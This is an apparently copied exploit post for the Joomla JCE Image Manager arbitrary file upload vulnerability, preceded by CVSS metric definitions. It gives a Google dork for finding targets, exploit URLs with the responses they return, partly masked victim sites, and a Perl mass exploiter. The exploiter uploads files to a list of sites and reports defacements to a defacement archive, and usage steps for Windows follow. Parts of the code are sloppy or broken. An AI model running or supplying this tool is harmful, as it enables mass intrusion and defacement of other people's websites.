The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
#################################################################################
Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
Vendor Homepage : joomlacontenteditor.net
Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
Date : 23/05/2018
Exploit Risk : High
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla! content easy...
Add a set of tools to your Joomla! environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe Flash, Apple Quicktime, Windows Media Player and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content form html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
#################################################################################
Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to a the following security vulnerabilities:
1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to
the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Affected JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT
This JCE is well-known by some hackers but some hackers do not know about nothing about this vulnerability. So this is the new one.
TARGETSTE/yourfilename.png .gif .jpg or TARGETSTE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes =>
Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An Attacker cannot reach this image manager without username and password on the control panel. But there is a little trick to upload a image or a file behind this vulnerability.
One Attacker must execute with remote file upload code.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial
[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial
[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability
[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
You can check with this exploit codes on your browser if the sites are vulnerable for testing the security. So you will see some errors.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}
Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
or giving this error => {"result":null,"error":"No function call specified!"}
Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}
Path => TARGETSTE/yourfilename.png gif jpg or TARGETSTE/images/yourfilename.png gif jpg html txt
Auto Mass Exploiter Perl =>
[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi alamyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
foreach $site(@TARGETS){
chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";
$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanclar\Mustafa\result\list.txt');
print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'
]
)->decoded_content;
if ($res =~ m/"error":false/i){
}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}
$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){
$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gnder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gnder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alnmad !! \n";
}
}[/code]
How to use this code on your operating system like Windows ;
Open Start + Go to Search Button + Type + Command Prompt [ Komut stemi ] => or cmd.exe
Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt
C:/Users/Your-Computer-Name/ cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl
site.txt
Waiting for Upload
Exploit Successful or Not
Finished
#################################################################################
Example Sites =>
aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":{"error":true,"result":""},"error":null}
sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}
bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum